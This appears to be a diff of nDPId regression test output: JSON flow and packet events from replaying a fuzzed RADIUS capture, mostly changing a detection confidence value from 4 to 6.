-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1528996068129,"flow_last_seen":1528997632064,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":38604,"flow_avg_l4_payload_len":448,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1528996068129,"flow_last_seen":1528997632064,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":38604,"flow_avg_l4_payload_len":448,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997654780,"flow_last_seen":1528997654780,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1528997654780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997654780,"pkt":"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"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997654780,"flow_last_seen":1528997654780,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997654780,"flow_last_seen":1528997654780,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1528997655006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997655006,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA5NAAPwRJQAlABk+CgxAHgcUchAAzVdGC1wAxX62GNWdpucNZiYPcJ1Tw+4BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyamE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4T0oBAgBIFwEAAAEF+QC\/pRrW1P2OBIB77PLtyYRYAgUAAKO0Q86taQAA4Eb2Dn1+Ei2LAQACCwUAANEKc5kzaUyUHJ2asC+h4v1QEoNkNdC6vGAIe51fKjW9k5g="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":165,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997655347} 01256{"packet_event_id":1,"packet_event_name":"packet","packet_id":165,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997655006,"pkt":"AAAMB6xAABRP+4rqCABFAALHnfCWAP8RAAAKDEAexuIZPnIQBxQCswAAAV0Cq2pJZM0ruVNMnb6INz7DlDAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFd2CQlXSVNQUjEwGgkQADghDQM1NwZbIqcXATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceUTAwLWE3KjQyLWQwLWUwQDAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6MjA6ZDE6N2Q6MzcvMjI4JAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAADLaWk9Y3GhxCUALFVq30f3AwIAIPJ2\/3EaFAAAV8gHDlZaV0MyVGVzdEzhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x4bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQXOelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZBbHVlGh0AADghExc0MC44MDQ4ODJOLTc2LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW26aXJlY3QaDAAABYMHBsB8SplQEpV0+y2O0IA5getcDb\/AJ1c="} 
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1528997655528,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997655528,"pkt":"ABRP+4rqcNuYZMUnCABFAAEwA5xAAPwRT9bG4hk+CgwlAAcUchB0HNn2Al0BFJBXpcO19tza8j\/VlLjh3P0aCwAAV8gbBVNQQxpuAAABNxA0jONf4TbIHPUvuy933g6GTJqzqlfKJTFZvtaM0NBQo2jkN\/g2tPEp73PKTNfSnSD8j7kRNPVhPusRHPLIHahhhZlLWh2egFea0oaNGerpaQMfhEQ5jMYg8ICzMJVYCSspbKc8\/fk7ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIjViMjJhNzE2L2YwOjc5OjYwOmQxOjclADM3LzIyOFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBIwdD70xCUAoHuVXO\/FXR+q"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 01393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1528997659285,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997659285,"pkt":"AAAMB6xAABRP+4rqCABFAALbtPFAAP8RAAAKDEAexuIZPnIQBxQCxwAAAV4Cv0qC4LnwI1oT30\/+r6N\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"} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997659473,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1528997659473,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997659473,"pkt":"ABRP+4rqcNuYVccnCABFAADhA6lAAPwRUBjG4hk+CgxAHgcUcm8AzZu5C14AxUxI+gXiLIrMuBk\/g\/m1ALsBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4T0oBAgBIFwEAAAEFAACnLVLIF0rTm6KFdNC987pOAgUAAJOGz1Q0xAAAaP51Ml0i0tuLAQACCwUAAGEYnEUncDkjDC3ik4qARkBQEl1GRO63bmbIH3rSxoBwm9k="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997659473,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997659473,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 01365{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1528997659803,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997659803,"pkt":"AAAMB6xAABRP+4rqCABFAALHtPJAAP8RAAAKDEAexuIZPnIQBxQCswAAAV8Cq4u3v\/AI1pCqOyPuExx1k6FwCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1RQZbIqcbATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jY\/0xMS4zZ3BwbmV0d29yay5vcmdZhhB+CDFjaXNjb4MGJQAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABjIAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAACko3IYMyHHAM47ZS3aaJ9qAwIAIPaHgNUaFAAAV8glAFaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997663786,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1528997663786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997663786,"pkt":"AAAMB6xAABRP+4rqCABFAALbIRJAAP8RAAAKDEAexuIZNXJ4BxQCxwAAAWACvwChXhfZ\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"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997663786,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997663786,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":620000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1528997663992,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1528997663992,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997663992,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA8JAAPuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997664564,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997664564,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 